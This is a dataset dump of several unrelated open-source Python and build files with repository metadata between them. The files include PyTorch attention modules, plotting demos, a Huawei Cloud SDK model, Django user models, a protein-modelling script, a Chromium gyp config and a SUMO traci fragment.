a = torch.sigmoid(aa + am).view(b, c, 1, 1)
return x * a
class CBAMSpatialAttention(nn.Module):
def __init__(self):
super().__init__()
self.conv = Conv2d(2, 1, kernel_size=7, norm_layer='bn')
def forward(self, x):
aa = x.mean(dim=1, keepdim=True)
am = x.max(dim=1, keepdim=True)[0]
a = torch.cat([aa, am], dim=1)
a = torch.sigmoid(self.conv(a))
return x * a
class CBAM(nn.Module):
def __init__(self, in_channels, reduction=4):
super().__init__()
self.channel = CBAMChannelAttention(in_channels, reduction)
self.spatial = CBAMSpatialAttention()
def forward(self, x):
x = self.channel(x)
x = self.spatial(x)
return x
class SELayerM(nn.Module):
def __init__(self, in_channels, reduction=4):
super().__init__()
channels = in_channels // reduction
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.layers = nn.Sequential(
nn.Linear(in_channels, channels),
nn.ReLU6(True),
nn.Linear(channels, in_channels),
HardSigmoid(True),
)
def forward(self, x):
b, c = x.size()[:2]
s = self.avgpool(x).view(b, c)
s = self.layers(s).view(b, c, 1, 1)
return x * s
def get_attention(name, **kwargs):
if not name:
return Identity()
name = name.lower()
if name == 'se':
return SEModule(**kwargs)
elif name == 'sem':
return SELayerM(**kwargs)
elif name == 'cbam':
return CBAM(**kwargs)
else:
raise NotImplementedError("No attention module named %s" % name)
|
[
"sbl1996@126.com"
] |
sbl1996@126.com
|
f9939dba69a49fcceaa92a28b7e0708a772e5a5d
|
51891febfc6247af3fe5c39b3063d1f1995a0173
|
/src/scatter3d_demo.py
|
50e8fbaac07658778552197aa7e1ff424f28fe21
|
[] |
no_license
|
jim1949/car_controller
|
4ab391eef29e46563853bc3d54a06a6c4a0714c4
|
f2053ddde429dbdef39261d24197f3bc7936166f
|
refs/heads/master
| 2020-12-25T14:23:37.339889
| 2016-09-13T09:55:07
| 2016-09-13T09:55:07
| 67,448,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,068
|
py
|
# import numpy as np
# from mpl_toolkits.mplot3d import Axes3D
# import matplotlib.pyplot as plt
# # def randrange(n, vmin, vmax):
# # return (vmax - vmin)*np.random.rand(n) + vmin
# # fig = plt.figure()
# # ax = fig.add_subplot(111, projection='3d')
# # n = 100
# # for c, m, zl, zh in [('r', 'o', -50, -25), ('b', '^', -30, -5)]:
# # xs = randrange(n, 23, 32)
# # ys = randrange(n, 0, 100)
# # zs = randrange(n, zl, zh)
# # ax.scatter(xs, ys, zs, c=c, marker=m)
# xs=np.array((range(1,100)))
# ys=np.array((range(1,100)))
# zs=np.array((range(1,100)))
# Axes3D.scatter(xs, ys, zs, zdir='z', c='b')
# ax.set_xlabel('X Label')
# ax.set_ylabel('Y Label')
# ax.set_zlabel('Z Label')
# plt.show()
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x =[1,2,3,4,5,6,7,8,9,10]
y =[5,6,2,3,13,4,1,2,4,8]
z =[2,3,3,3,5,7,9,11,9,10]
ax.scatter(x, y, z, c='r', marker='o')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show()
|
[
"jim1949@163.com"
] |
jim1949@163.com
|
1891a0d48660d0b40e0a7143031cddabaaaca6d6
|
c1267fbec95318184e7388cddf9b7085f797d514
|
/2023/03 March/db03242023.py
|
c6859abc43ce48d34df3d2d5d2e620c5251009bd
|
[
"MIT"
] |
permissive
|
vishrutkmr7/DailyPracticeProblemsDIP
|
1aedfd2e173847bf22989a6b0ec550acebb2bd86
|
2c365f633a1e1bee281fbdc314969f03b17ac9ec
|
refs/heads/master
| 2023-05-31T23:49:52.135349
| 2023-05-28T09:32:12
| 2023-05-28T09:32:12
| 199,596,248
| 10
| 4
|
MIT
| 2022-11-02T21:31:59
| 2019-07-30T07:12:46
|
Python
|
UTF-8
|
Python
| false
| false
| 563
|
py
|
"""
Given positive an integer num, return whether or not it is a perfect square.
Ex: Given the following num...
num = 9, return true.
Ex: Given the following num...
num = 18, return false.
"""
class Solution:
def isPerfectSquare(self, num: int) -> bool:
r = num
while r**2 > num:
r = (r + num / r) // 2
return r**2 == num
# Test Cases
if __name__ == "__main__":
solution = Solution()
assert solution.isPerfectSquare(9) is True
assert solution.isPerfectSquare(18) is False
print("All tests passed.")
|
[
"vishrutkmr7@gmail.com"
] |
vishrutkmr7@gmail.com
|
8295157610a4f2105ed98d1ae6239095adf384e2
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-vpcep/huaweicloudsdkvpcep/v1/model/update_endpoint_service_request_body.py
|
3bc8d522210d8b68191c685c6dd1771204d35e22
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,291
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateEndpointServiceRequestBody:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'approval_enabled': 'bool',
'service_name': 'str',
'ports': 'list[PortList]',
'port_id': 'str',
'vip_port_id': 'str'
}
attribute_map = {
'approval_enabled': 'approval_enabled',
'service_name': 'service_name',
'ports': 'ports',
'port_id': 'port_id',
'vip_port_id': 'vip_port_id'
}
def __init__(self, approval_enabled=None, service_name=None, ports=None, port_id=None, vip_port_id=None):
"""UpdateEndpointServiceRequestBody - a model defined in huaweicloud sdk"""
self._approval_enabled = None
self._service_name = None
self._ports = None
self._port_id = None
self._vip_port_id = None
self.discriminator = None
if approval_enabled is not None:
self.approval_enabled = approval_enabled
if service_name is not None:
self.service_name = service_name
if ports is not None:
self.ports = ports
if port_id is not None:
self.port_id = port_id
if vip_port_id is not None:
self.vip_port_id = vip_port_id
@property
def approval_enabled(self):
"""Gets the approval_enabled of this UpdateEndpointServiceRequestBody.
是否需要审批。 ● false:不需审批,创建的终端节点连 接直接为accepted状态。 ● true:需审批,创建的终端节点连接 需要终端节点服务所属用户审核后方 可使用。 默认为true,需要审批。
:return: The approval_enabled of this UpdateEndpointServiceRequestBody.
:rtype: bool
"""
return self._approval_enabled
@approval_enabled.setter
def approval_enabled(self, approval_enabled):
"""Sets the approval_enabled of this UpdateEndpointServiceRequestBody.
是否需要审批。 ● false:不需审批,创建的终端节点连 接直接为accepted状态。 ● true:需审批,创建的终端节点连接 需要终端节点服务所属用户审核后方 可使用。 默认为true,需要审批。
:param approval_enabled: The approval_enabled of this UpdateEndpointServiceRequestBody.
:type: bool
"""
self._approval_enabled = approval_enabled
@property
def service_name(self):
"""Gets the service_name of this UpdateEndpointServiceRequestBody.
终端节点服务的名称,长度不大于16, 允许传入大小写字母、数字、下划线、 中划线。
:return: The service_name of this UpdateEndpointServiceRequestBody.
:rtype: str
"""
return self._service_name
@service_name.setter
def service_name(self, service_name):
"""Sets the service_name of this UpdateEndpointServiceRequestBody.
终端节点服务的名称,长度不大于16, 允许传入大小写字母、数字、下划线、 中划线。
:param service_name: The service_name of this UpdateEndpointServiceRequestBody.
:type: str
"""
self._service_name = service_name
@property
def ports(self):
"""Gets the ports of this UpdateEndpointServiceRequestBody.
服务开放的端口映射列表,详细内容请 参见表4-22。 同一个终端节点服务下,不允许重复的 端口映射。若多个终端节点服务共用一 个port_id,则终端节点之间服务的所有 端口映射的server_port和protocol的组合 不能重复,单次最多添加200个。
:return: The ports of this UpdateEndpointServiceRequestBody.
:rtype: list[PortList]
"""
return self._ports
@ports.setter
def ports(self, ports):
"""Sets the ports of this UpdateEndpointServiceRequestBody.
服务开放的端口映射列表,详细内容请 参见表4-22。 同一个终端节点服务下,不允许重复的 端口映射。若多个终端节点服务共用一 个port_id,则终端节点之间服务的所有 端口映射的server_port和protocol的组合 不能重复,单次最多添加200个。
:param ports: The ports of this UpdateEndpointServiceRequestBody.
:type: list[PortList]
"""
self._ports = ports
@property
def port_id(self):
"""Gets the port_id of this UpdateEndpointServiceRequestBody.
标识终端节点服务后端资源的ID,格式 为通用唯一识别码(Universally Unique Identifier,下文简称UUID)。取值为: ● LB类型:增强型负载均衡器内网IP对 应的端口ID。详细内容请参考《弹性 负载均衡API参考》中的“查询负载均 衡详情”,详见响应消息中的 “vip_port_id”字段。 ● VM类型:弹性云服务器IP地址对应的 网卡ID。详细内容请参考《弹性云服 务器API参考》中的“查询云服务器网 卡信息”,详见响应消息中的 “port_id”字段。 ● VIP类型:虚拟资源所在物理服务器对 应的网卡ID。 说明 当后端资源为“LB类型”时,仅支持修改为 同类型后端资源的“vip_port_id”。 例如,共享型负载均衡仅支持更换为共享型 负载均衡,不支持更换为独享型负载均衡。
:return: The port_id of this UpdateEndpointServiceRequestBody.
:rtype: str
"""
return self._port_id
@port_id.setter
def port_id(self, port_id):
"""Sets the port_id of this UpdateEndpointServiceRequestBody.
标识终端节点服务后端资源的ID,格式 为通用唯一识别码(Universally Unique Identifier,下文简称UUID)。取值为: ● LB类型:增强型负载均衡器内网IP对 应的端口ID。详细内容请参考《弹性 负载均衡API参考》中的“查询负载均 衡详情”,详见响应消息中的 “vip_port_id”字段。 ● VM类型:弹性云服务器IP地址对应的 网卡ID。详细内容请参考《弹性云服 务器API参考》中的“查询云服务器网 卡信息”,详见响应消息中的 “port_id”字段。 ● VIP类型:虚拟资源所在物理服务器对 应的网卡ID。 说明 当后端资源为“LB类型”时,仅支持修改为 同类型后端资源的“vip_port_id”。 例如,共享型负载均衡仅支持更换为共享型 负载均衡,不支持更换为独享型负载均衡。
:param port_id: The port_id of this UpdateEndpointServiceRequestBody.
:type: str
"""
self._port_id = port_id
@property
def vip_port_id(self):
"""Gets the vip_port_id of this UpdateEndpointServiceRequestBody.
虚拟IP的网卡ID。
:return: The vip_port_id of this UpdateEndpointServiceRequestBody.
:rtype: str
"""
return self._vip_port_id
@vip_port_id.setter
def vip_port_id(self, vip_port_id):
"""Sets the vip_port_id of this UpdateEndpointServiceRequestBody.
虚拟IP的网卡ID。
:param vip_port_id: The vip_port_id of this UpdateEndpointServiceRequestBody.
:type: str
"""
self._vip_port_id = vip_port_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateEndpointServiceRequestBody):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
aa044018408c1b28331bd6260ab341a84fc5a936
|
bc167f434158921bcf2c678155c5cdfec1c9b0c9
|
/PI_code/simulator/behaviourGeneration/buildBehaviour.py~
|
61fb21ba3d039ecacb623931e2bf58e4efd62509
|
[] |
no_license
|
s0217391/DifferentProjects
|
6450efc89c64ecd21b86c705737e89e5c69433a6
|
7f4da153660817b6cbf72d2e823aa29c0c2f95a9
|
refs/heads/master
| 2021-01-17T02:58:46.219240
| 2015-05-26T22:45:46
| 2015-05-26T22:45:46
| 34,995,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
#!/usr/bin/python
import sys
import expressionBuilder as eb
def writeLine(f, st = '', tabs = 0):
result = ""
for i in range(tabs):
result = result + " "
result = result + st
f.write(result)
f.write('\n')
def startFile(f):
writeLine(f, '#!/usr/bin/python');
writeLine(f, 'import sys');
writeLine(f)
writeLine(f, "def compute(prey, otherHunter, dist):")
def main(argv=None):
for i in range(0, 500):
newscript = open("group/behav" + str(i + 1) + ".py", 'w')
startFile(newscript)
lines = eb.generateCodeBlock(seed = i, minlns = 3, maxlns = 25)
for x in lines:
(line, tabs) = x
writeLine(newscript, line, tabs + 1)
if __name__ == "__main__":
sys.exit(main())
|
[
"i7674211@bournemouth.ac.uk"
] |
i7674211@bournemouth.ac.uk
|
|
716b5557af847737363d572821718326db017f6c
|
e2e9ae72910dd29877de026866a6f13335815ca6
|
/prml/kernels/kernel.py
|
03ad8127e24cddaca11a6e7edd0c46a111d14bf3
|
[] |
no_license
|
zshwuhan/PRML
|
b39f09e14cd1169ff44e7299b8adfdd3aea2f94d
|
497d985f6387fc31d5fe861533cb333e06f80469
|
refs/heads/master
| 2021-05-14T23:40:27.351492
| 2017-09-21T12:48:46
| 2017-09-21T12:48:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 540
|
py
|
import numpy as np
class Kernel(object):
def _pairwise(self, x, y):
"""
all pairs of x and y
Parameters
----------
x : (sample_size, n_features)
input
y : (sample_size, n_features)
another input
Returns
-------
output : tuple
two array with shape (sample_size, sample_size, n_features)
"""
return (
np.tile(x, (len(y), 1, 1)).transpose(1, 0, 2),
np.tile(y, (len(x), 1, 1))
)
|
[
"r0735nj5058@icloud.com"
] |
r0735nj5058@icloud.com
|
82461d66890b1704b59ea9a59d8c4729e2e080b8
|
f085af63a93cb12feca75a3d9e855c3373d2b78e
|
/dynamic_programming/longest_nondecreasing_subsequence_length.py
|
ec8cd8dc441a12123420e33dfbc9572f6318d970
|
[] |
no_license
|
zjxpirate/Daily-Upload-Python
|
9542f1a3491ac5c843bc80266523bc06c37be20e
|
d5efcfdaf7e632e1f0cb8b21c505c0c0a5325eb0
|
refs/heads/master
| 2020-04-03T08:10:55.667410
| 2019-06-27T01:15:36
| 2019-06-27T01:15:36
| 155,124,951
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
# 15. find the longest nondecreasing subsequence
list1 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9]
def longest_nondecreasing_subsequence_length(A):
# max_length[i] holds the length of the longest nondecreasing subsequence of A[:i + 1].
max_length = [1] * len(A)
for i in range(1, len(A)):
max_length[i] = max(1 + max((max_length[j] for j in range(i) if A[i] >= A[j]), default=0), max_length[i])
return max(max_length)
print(longest_nondecreasing_subsequence_length(list1))
|
[
"j_zhang21@u.pacific.edu"
] |
j_zhang21@u.pacific.edu
|
2482542d358ddfb289a586947cba5d91d129a318
|
f445450ac693b466ca20b42f1ac82071d32dd991
|
/generated_tempdir_2019_09_15_163300/generated_part007021.py
|
2025aafae69c6640949ff7fe65450879584c3cdd
|
[] |
no_license
|
Upabjojr/rubi_generated
|
76e43cbafe70b4e1516fb761cabd9e5257691374
|
cd35e9e51722b04fb159ada3d5811d62a423e429
|
refs/heads/master
| 2020-07-25T17:26:19.227918
| 2019-09-15T15:41:48
| 2019-09-15T15:41:48
| 208,357,412
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,300
|
py
|
from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher137075(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.2.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.1.2.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher137075._instance is None:
CommutativeMatcher137075._instance = CommutativeMatcher137075()
return CommutativeMatcher137075._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 137074
return
yield
from collections import deque
|
[
"franz.bonazzi@gmail.com"
] |
franz.bonazzi@gmail.com
|
617571ece63ec1c75aaac8ba508201a4956ff656
|
ce741ade3d7ebfc64cf2736358f6e77b06168830
|
/apps/users/models.py
|
548f619885ca2197b733f8ec22122e00804d4162
|
[] |
no_license
|
Erick-LONG/MxShop
|
798a1ce4eb557973732ee6206640bdf9a247216b
|
783e5d66a4d49b3eceb3eb6d7c729fcfa69742cb
|
refs/heads/master
| 2021-04-03T08:31:41.588749
| 2018-03-22T04:01:46
| 2018-03-22T04:01:46
| 124,395,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,238
|
py
|
from datetime import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UserProfile(AbstractUser):
'''用户'''
name = models.CharField(max_length=30,null=True,blank=True,verbose_name='姓名')
birthday = models.DateField(null=True,blank=True,verbose_name='出生年月')
mobile = models.CharField(null=True,blank=True,max_length=11,verbose_name='电话')
gender = models.CharField(max_length=6,choices=(('male','男'),('female','女'),),default='female',verbose_name='性别')
email = models.EmailField(max_length=100,null=True,blank=True,verbose_name='邮箱')
class Meta:
verbose_name = '用户'
verbose_name_plural = verbose_name
def __str__(self):
return self.username
class VerifyCode(models.Model):
'''短信验证码'''
code = models.CharField(max_length=10,verbose_name='验证码')
mobile = models.CharField(max_length=11, verbose_name='电话')
add_time = models.DateTimeField(default=datetime.now,verbose_name='添加时间')
class Meta:
verbose_name = '短信验证码'
verbose_name_plural = verbose_name
def __str__(self):
return self.code
|
[
"834424581@qq.com"
] |
834424581@qq.com
|
60f10d228169389471da351b6d96d2bffe92e6f0
|
2d27360e2038546a38746912fa75dbde8667ee61
|
/make_dogC.py
|
cc4a3b7215091b543f863bdc11c36a5f125ffa5e
|
[
"MIT"
] |
permissive
|
matteoferla/DogCatcher
|
234353eb0e2f8177e59314e62d901b13bed1a265
|
ff7edb88b73aa0585d8f6528ccfc22939c934fb5
|
refs/heads/master
| 2023-05-07T18:16:58.632024
| 2021-06-02T07:23:35
| 2021-06-02T07:23:35
| 257,064,986
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,538
|
py
|
from model_maker import Catcher, pyrosetta
import json
pymol = pyrosetta.PyMOLMover()
dogC = Catcher(lyx=9, asx=121, glh=70, asx_type='ASN', cut_resi=105, other_res=['WAT'],
params_folder='params',
iso_constraint_file='constraints/iso.dogC.cst',
trans_constraint_file='constraints/ASA-LYX.dogC.cst')
## Starting pose
print('Starting pose')
#pose = dogC.load_pose_from_file('data/RrgA.altered.pdb')
pose = dogC.load_pose_from_file('../RrgA.relaxed.pdb')
pymol.pymol_name('init')
pymol.apply(pose)
# dogC.relax_with_ED(pose, 'data/2ww8.ccp4')
pymol.apply(pose)
logbook = {}
s = dogC.get_score_panel(pose, save_variants=True, filename='models/00_initial')
s['description'] = 'PDB:2WW8 734-860 energy minimised against CCP4 map'
logbook['native'] = s
json.dump(logbook, open('scores.json', 'w'))
# G109T
print('G109T')
G109T = dogC.make_mutant(pose, 'G109T')
s = dogC.get_score_panel(G109T, save_variants=True, filename='models/01a_G109T')
s['description'] = 'PDB:2WW8 734-860 G109T'
logbook['G109T'] = s
json.dump(logbook, open('scores.json', 'w'))
pymol.pymol_name('G109T')
pymol.apply(G109T)
# N115G
print('N115G')
N115G = dogC.make_mutant(pose, 'N115G')
s = dogC.get_score_panel(N115G, save_variants=True, filename='models/01b_N115G')
s['description'] = 'PDB:2WW8 734-860 N115G'
logbook['N115G'] = s
json.dump(logbook, open('scores.json', 'w'))
pymol.pymol_name('N115G')
pymol.apply(N115G)
# G109T N115G
print('G109T N115G')
base = dogC.make_mutant(G109T, 'N115G')
s = dogC.get_score_panel(base, save_variants=True, filename='models/02_dogC')
s['description'] = 'PDB:2WW8 734-860 G109T N115G "DogC"'
logbook['dogC'] = s
json.dump(logbook, open('scores.json', 'w'))
pymol.pymol_name('DogC')
pymol.apply(base)
#A75P
print('A75P')
A75P = dogC.make_mutant(base, 'A75P')
dogC.relax_loop(A75P, 73, 80)
s = dogC.get_score_panel(A75P, save_variants=True, filename='models/03_A75P')
s['description'] = 'A75P'
logbook['A75P'] = s
json.dump(logbook, open('scores.json', 'w'))
pair_A = dogC.make_double_mutant(A75P, ['N11D', 'N13T'])
s = dogC.get_score_panel(pair_A, save_variants=True, filename='models/04a_N11D_N13T')
s['description'] = 'N11D N13T A75P'
logbook['N11D N13T'] = s
pair_B = dogC.make_double_mutant(A75P, ['D4E', 'K59T'])
s = dogC.get_score_panel(pair_B, save_variants=True, filename='models/04b_D4E_K59T')
s['description'] = 'D4E K59T A75P'
logbook['D4E K59T'] = s
pair_C = dogC.make_double_mutant(A75P, ['A87E', 'I101A'])
s = dogC.get_score_panel(pair_C, save_variants=True, filename='models/04c_A87E_I101A')
s['description'] = 'A75P A87E I101A'
logbook['A87E I101A'] = s
quad = dogC.make_double_mutant(pair_A, ['D4E', 'K59T'])
s = dogC.get_score_panel(quad, save_variants=True, filename='models/05_D4E_N11D_N13T_K59T')
s['description'] = 'D4E N11D N13T K59T'
logbook['D4E N11D N13T K59T A75P'] = s
for letter, resi in (('d', 'A38P'), ('e','Y45G'), ('f','N47D'), ('g','N92D'), ('h','A87E')):
x = dogC.make_mutant(A75P, resi)
s = dogC.get_score_panel(x, save_variants=True, filename=f'models/04{letter}_{resi}')
s['description'] = f'A75P {resi}'
logbook[resi] = s
json.dump(logbook, open('scores.json', 'w'))
pair_D = dogC.make_double_mutant(A75P, ['A87E', 'I101A'])
s = dogC.get_score_panel(pair_D, save_variants=True, filename='models/04i_N47D_N92D')
s['description'] = 'N47D A75P N92D'
logbook['N47D A75P N92D'] = s
aqua = dogC.make_double_mutant(quad, ['N92D', 'N47D'])
s = dogC.get_score_panel(aqua, save_variants=True, filename='models/06_N47D_N92D')
s['description'] = 'D4E N11D N13T N47D A75P K59T N92D'
logbook['D4E N11D N13T N47D A75P K59T N92D'] = s
F69I = dogC.make_mutant(aqua, 'F69I')
s = dogC.get_score_panel(F69I, save_variants=True, filename='models/07a_F69I')
s['description'] = '+ F69I'
logbook['F69I'] = s
json.dump(logbook, open('scores.json', 'w'))
Q89R = dogC.make_mutant(aqua, 'Q89R')
s = dogC.get_score_panel(Q89R, save_variants=True, filename='models/07b_Q89R')
s['description'] = '+ Q89R'
logbook['Q89R'] = s
json.dump(logbook, open('scores.json', 'w'))
A87S = dogC.make_mutant(aqua, 'A87S')
s = dogC.get_score_panel(A87S, save_variants=True, filename='models/07c_A87S')
s['description'] = '+ A87S'
logbook['A87S'] = s
json.dump(logbook, open('scores.json', 'w'))
phage = dogC.make_double_mutant(aqua, ['Q89R', 'A87S', 'F69I'])
s = dogC.get_score_panel(phage, save_variants=True, filename='models/08_F69I_A87S_Q89R')
s['description'] = '+ F69I A87S Q89R'
logbook['F69I A87S Q89R'] = s
json.dump(logbook, open('scores.json', 'w'))
|
[
"matteo.ferla@gmail.com"
] |
matteo.ferla@gmail.com
|
e0d8b0932a51cce603529841b3292b2ad1ba6353
|
38c10c01007624cd2056884f25e0d6ab85442194
|
/chrome/browser/resources/settings/controls/compiled_resources.gyp
|
75cbbb52ea0a4979d02b08222e3564aa9cac2829
|
[
"BSD-3-Clause"
] |
permissive
|
zenoalbisser/chromium
|
6ecf37b6c030c84f1b26282bc4ef95769c62a9b2
|
e71f21b9b4b9b839f5093301974a45545dad2691
|
refs/heads/master
| 2022-12-25T14:23:18.568575
| 2016-07-14T21:49:52
| 2016-07-23T08:02:51
| 63,980,627
| 0
| 2
|
BSD-3-Clause
| 2022-12-12T12:43:41
| 2016-07-22T20:14:04
| null |
UTF-8
|
Python
| false
| false
| 1,932
|
gyp
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'settings_checkbox',
'variables': {
'depends': [
'../../../../../ui/webui/resources/js/compiled_resources.gyp:assert',
'../../../../../ui/webui/resources/js/compiled_resources.gyp:load_time_data',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_indicator_behavior.js',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_pref_behavior.js',
],
'externs': [
'../../../../../third_party/closure_compiler/externs/settings_private.js'
],
},
'includes': ['../../../../../third_party/closure_compiler/compile_js.gypi'],
},
{
'target_name': 'settings_input',
'variables': {
'depends': [
'../../../../../ui/webui/resources/js/compiled_resources.gyp:assert',
'../../../../../ui/webui/resources/js/compiled_resources.gyp:load_time_data',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_indicator_behavior.js',
'../../../../../ui/webui/resources/cr_elements/policy/cr_policy_pref_behavior.js',
],
'externs': [
'../../../../../third_party/closure_compiler/externs/settings_private.js'
],
},
'includes': ['../../../../../third_party/closure_compiler/compile_js.gypi'],
},
{
'target_name': 'settings_radio_group',
'variables': {
'depends': [
'../../../../../ui/webui/resources/js/compiled_resources.gyp:assert',
],
'externs': [
'../../../../../third_party/closure_compiler/externs/settings_private.js'
],
},
'includes': ['../../../../../third_party/closure_compiler/compile_js.gypi'],
},
],
}
|
[
"zeno.albisser@hemispherian.com"
] |
zeno.albisser@hemispherian.com
|
65b8f955f5a177896154f778e3d5a466193e38b0
|
2352bc07e12b0256913559cf3485a360569ccd5e
|
/Practice/code_class/Crossin-practices/python-cocos2d/practice.py
|
03ae4f527a72db206c7f6622f7b49d67d17d3b0c
|
[] |
no_license
|
Dis-count/Python_practice
|
166ae563be7f6d99a12bdc0e221c550ef37bd4fd
|
fa0cae54e853157a1d2d78bf90408c68ce617c1a
|
refs/heads/master
| 2022-12-12T03:38:24.091529
| 2021-12-22T09:51:59
| 2021-12-22T09:51:59
| 224,171,833
| 2
| 1
| null | 2022-12-08T05:29:38
| 2019-11-26T11:07:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
# -*- coding: utf-8 -*-
import cocos
import random
class Testgame(cocos.layer.Layer):
# pass
def __init__(self):
super(Testgame,self).__init__()
# self.logo = cocos.sprite.Sprite()
# self.logo.position = 550,400
# self.add(self.logo,9999)
txt = cocos.text.Label(u'最棒了最棒了')
txt.position = 300,200
self.add(txt)
self.ppx = cocos.sprite.Sprite('ppx_rush1.png')
self.ppx.position = 200,300
self.add(self.ppx)
self.speed_x = 3
self.speed_y = 3
self.schedule(self.update)
def update(self,dt):
self.ppx.x += self.speed_x
if self.ppx.x > 600:
self.speed_x = -(1+4*random.random())
elif self.ppx.x < 0:
self.speed_x = 3
self.ppx.y += self.speed_y
if self.ppx.y > 480:
self.speed_y = -3
elif self.ppx.y <0:
self.speed_y = 3
cocos.director.director.init(caption=u'测试')
cocos.director.director.run(cocos.scene.Scene(Testgame()))
|
[
"492193947@qq.com"
] |
492193947@qq.com
|
98e13b59b62ddedc3ca4697d2082d3d67f574de7
|
eb0fc861564058487117325298eccce468f6ceb8
|
/yo/services/notification_sender/cli.py
|
adae1c7d8b43e370f382cb7e84ec7aa0569d7141
|
[
"MIT"
] |
permissive
|
dpays/dpay-notifications
|
239c92243ae53c485bfa44bb7b7e344203645241
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
refs/heads/master
| 2020-03-26T21:19:22.793303
| 2018-09-08T04:26:12
| 2018-09-08T04:26:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
# -*- coding: utf-8 -*-
import click
import yo.yolog
@click.command(name='sender')
@click.option('--database_url', envvar='DATABASE_URL')
def yo_noitification_sender_service(database_url):
from yo.services.notification_sender import main_task
main_task(database_url=database_url)
if __name__ == '__main__':
yo_noitification_sender_service()
|
[
"john.gerlock@gmail.com"
] |
john.gerlock@gmail.com
|
c11ddbb3c8c40a72606cae4a86c24ef46d3da507
|
acf426a78ded4a078063d05457075fedba8f5310
|
/mn_wifi/sumo/traci/_inductionloop.py
|
47c322177a8a427c3fa85e06cc1e7b7947b2c0bb
|
[
"LicenseRef-scancode-x11-stanford"
] |
permissive
|
intrig-unicamp/mininet-wifi
|
3b58e6cf7b422cfe0f8990e173e77d7ba1d54616
|
985bf0ca2f11ca2ba17e44518e0df550070ddfba
|
refs/heads/master
| 2023-08-27T03:36:41.005380
| 2023-07-27T13:07:32
| 2023-07-27T13:07:32
| 35,002,369
| 419
| 278
|
NOASSERTION
| 2023-09-12T03:42:45
| 2015-05-03T22:03:07
|
Python
|
UTF-8
|
Python
| false
| false
| 4,605
|
py
|
# -*- coding: utf-8 -*-
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2011-2017 German Aerospace Center (DLR) and others.
# This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v2.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v20.html
# @file _inductionloop.py
# @author Michael Behrisch
# @author Daniel Krajzewicz
# @date 2011-03-16
# @version $Id$
from __future__ import absolute_import
from .domain import Domain
from .storage import Storage
from . import constants as tc
def readVehicleData(result):
result.readLength()
nbData = result.readDouble()
data = []
for i in range(nbData):
result.read("!B")
vehID = result.readString()
result.read("!B")
length = result.readDouble()
result.read("!B")
